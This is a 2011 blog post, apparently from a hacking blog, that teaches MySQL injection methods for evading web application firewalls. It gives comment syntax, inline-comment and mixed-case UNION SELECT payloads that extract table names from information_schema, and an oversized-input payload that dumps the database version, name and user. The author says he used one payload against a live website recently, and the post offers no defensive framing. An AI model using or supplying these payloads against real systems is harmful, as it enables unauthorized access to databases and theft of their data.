Monday, September 12, 2011

MySQL injection with Bypassing WAF:


SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query. Some comments in SQL:
//, — , /**/, #, –+, — -, ;

Case Changing:

 Some WAF’s filter key words like /union\select/ig We can bypass this filter by using inline comments most of the time, More complex examples will require more advanced approach like adding SQL keywords that will further separate the two words:


Take notice of the exclamation point /*!code*/ The exclamation point executes our SQL statement.
Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can add more inline comments. For example:

id=1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/=database()– -

This bypass above works. I myself just used this against a Web site recently.

Buffer Overflow:/Unexpected input:
A lot of WAFS are written in the C language making them prone to overflow or or act differently when loaded with a bunch of data. Here is a WAF that does it’s job correctly, but when given a large amount of Data allows the malicious request and response.

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26


Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More